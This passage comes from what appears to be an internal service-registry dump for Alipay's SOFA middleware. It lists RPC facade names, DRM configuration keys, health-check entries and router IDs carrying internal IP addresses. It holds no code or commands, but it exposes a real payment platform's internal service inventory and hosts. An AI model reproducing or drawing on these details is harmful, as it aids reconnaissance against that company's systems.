InteractionChatService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paymentmngTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cif.facade.CertBindingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchprod.common.service.facade.merchant.MrchProdBankInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorcenter.common.service.trade.facade.AdvisorJVQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.message.template.CardServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.common.facade.control.api.BailAuthServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbomp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.weiboMediaLevelHigh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.minicreateweb.api.Ucdp:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.appxprod.common.service.facade.api.attribute.AttributeRelationMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.FengdieControlConfig.operationReviewerWithProductStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:gfintertrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.177.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.frdecision.common.service.facade.api.EventRecordProcessNodeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.query.FinVirtualAssetLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.userHelpLevelLow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipayplus.mobile.component.common.facade.cdp.mng.CdpCreativeContentManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.96.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.common.service.facade.channel.spi.ChannelValidateProductValidateService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.content.facade.ContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.govbizcenter.service.facade.accufund.AccuFundRouterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.fininfo.pcconfigObDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.finaggexpcoreChannelId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfmng.service.facade.fundboss.FBReconResultManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.customerTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.common.service.hbase.BufferTableResource.tableBufferedConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","abnclprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dadeploymentunit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.lifeexprod.facade.KmsUserPrivkeyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.cloudprovision.conf.requestconfig.requestCheckTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csconfig.service.facade.api.TreeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.consumequery.common.service.facade.ConsumeRecordQueryRzoneServiceExt:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.vehownerprod.facade.vehplatform.VehicleMsgAppConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageConsumeService:1.0:openbizmock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.conf.facade.MetaVersionConfService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.creditacceptance.common.service.facade.FulfillmentOrderRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.CreditOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.captablelog.CapTableLogManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.definfund.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:secops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.postmen.api.MessageApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA-SCHEDULER-S-S_keplerapi_monitor#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.20.164.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityidentify.service.privacyquestion.PrivacyQuestionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.135.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custcenter.bizservice.facade.DivisionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.customerservice.InstBotQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.CycleCardServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileprod.facade.TransferRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.WhitelistBloomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdSceneMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbatch.comm.service.facade.callback.SchedulerNotifyService:1.0:fininflux@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.rule.core.engine.config.RuleEngineResource.rulePerfJudgements,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanapply.common.service.facade.service.approval.ApprovalManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcbenefitcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.bds.facade.item.BdsItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","OLD_CLIENTSERVICE_TEST_2_2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.67.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.ipay.icif.service.facade.api.UserRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.123.187#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.supergw.service.facade.transaction.config.LimitConfigService:1.0:isupergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.facade.api.AccenterReconMappingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.config.ConfigSimpleService:1.0:journeyNodeConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditamount.service.PcreditAmountUserSettingsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianquery.digestquery.common.service.EndorsementListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.nuccInstChannelApis,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.ctudb.CtuSceneRiskCountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.fininfo_finfotransTddlDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:dqcoupontoolstwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.core.service.cache.InsIopCacheCenter:1.0:insIopRecommendRecallCacheCenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.zpaas.zpaas_local_slave_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ternadmin.facade.TernSiteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.core.AutoKnowledgeFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iotcube.common.service.facade.openapi.upgrade.UpgradePackageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insautomarket.common.facade.mission.JointUserMissionFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.46.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.uctproc:name=com.alipay.analyze.core.scheduler.drm.UctSchedulerResource.closeAllScheduler,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.48.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileappcommon.common.service.facade.baas.FeedbackOpinionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:myexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkloandecision.service.facade.agds.GeneralCustRelationOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.242.248#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.credible.CredibleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlegalchain.common.service.facade.api.NdaSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.seller.SellerConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.FundInvestTargetCriterionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.aipNotifySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.order.OcOrderQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gfcenter.common.service.facade.ArInvoiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insusercenter.facade.relation.api.MyFamilyRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobile.mdevsupport.facade.grayscale.GrayscaleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.RopPunishImmuneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.supergw.service.facade.transaction.MessageReceiveService:1.0:fcfluxnet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.clientcache.facade.ClientCacheManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:intimateprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.sdk.risk.callback.RiskDefenseCheckCallback:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.elecomponent.EleComponentOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antchaos.facade.api.ChaosSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.NotifyInfoWSService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.unifiedasset.order.AssetUnifiedOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.gzone.activity.platform.ActivityProcessNodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.schemacenter.common.service.facade.api.serviceschema.LogServiceSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wall.common.service.otr.OrganizationTalentReviewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.lisa.service.alipayauth.LisaProductConfService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.quotation.FqpQcQuotationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developertool.facade.resource.ResourceProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcalbmng.facade.fssu.FssuInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_DAMIN_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openeco.facade.recon.ReconAlipayDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fundprod_on_shelves_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:minicreateweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.trsbrain.common.service.facade.spi.RecoverServiceFacade:1.0:trsbrain-common@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@insofflineinvest#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.voucherprod.facade.api.voucher.VcpVoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iarcore.operate.common.service.ContractRollbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.DomainQueryFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rockfuzz.common.service.facade.FuzzE2ECaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:workflow_feedback_feedbackGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.FundCancelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inststub.common.service.facade.project.SimulateProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bcm.common.service.facade.ProxyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.safeguardhelper.WorkRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bizfundprod.common.service.facade.transfer.BatchTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pointprod.common.service.pointlibrary.api.PointLibraryManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.api.MessageTemplateCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.messagefusion.facade.api.SubscribeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.GrpCampInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ssdataprod.common.service.facade.RainScoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.college.ExamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.113.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.financemng.biz.shared.task.TaskUnitExecute:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.aciamcore.common.service.facade.identity.OperatorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fundprod.common.service.facade.product.manage.FpPropertyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.api.AccurateMatcherService:1.0:csaccurate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membercenter.service.facade.PasswordManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetnet.common.service.facade.api.AssetPoolProcessServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.rendedatahandler.intData,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alifi.aegis.service.repay.warning.Warning4RepayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:algoevaluator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mobilerelation#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mindv.okcourse.service.OkUserTrailMoblieService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@tiyubiz#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_11.158.0.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acordercore.common.service.facade.admin.OrderProductAdminFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecocheck.common.service.facade.ScriptDebugFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:xface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.itest.capture.service.ItestCaptureService:1.0:mobile-wp-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.institution.InstitutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.biz.agreement.api.query.ExternalUsageAgreementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.business.platform.enterprise.facade.EntRoleOperatorRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.228.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dt.dataphin.openapi.ResourceService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:complain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:finassistantcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ilimitcenter.service.facade.api.LimitConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.248#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.scheduler.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fpdecision.platform.common.service.facade.iface.RiskAxelReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.FinancingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:zpdcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acwareslifecore.common.service.facade.WareInstanceQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.membertangram.common.service.facade.task.HuaBeiTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.service.facade.mng.TargetingMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","livetradeprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.122.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.adaptor.staragent.StaragentCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.zm.ZmMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.console.common.service.facade.SemanticServiceFacade:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.chair.businessgray.drm.renderGray.renderOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.kmi.client.cache.PgpKeyCacheRefresher.keyName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.0.174.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csrobot.service.facade.mng.api.GlobalConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.paymentmng.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.messagefusion.inner.facade.api.AlgorithmTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:lifemsgprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.BizTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.msg.MessageBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.metadata.common.logic.facade.api.SchemaMetaApi:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.schedule.ScheduleService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.WhitelistBloomFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.service.CertOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.252.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:publictest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custassetTBaseCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.GroupRelationCountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openeval.common.service.facade.eval.BdStaticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cloudinc:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.grayPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniselfop.facade.api.miniunifydata.MiniDataIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.ServerGroupService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.sdk.config.api.MemoryConfigFacade:1.0:opscloudcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvServerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.dynamic.DynamicBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.dal.ldc.offlinepay.daointerface.StationSubscribeDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserAccountArService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.da.common.service.facade.api.MerchantSuggestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.college.CourseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.channel.config.SettleSchemaFacade:1.0@DEFAULT#@#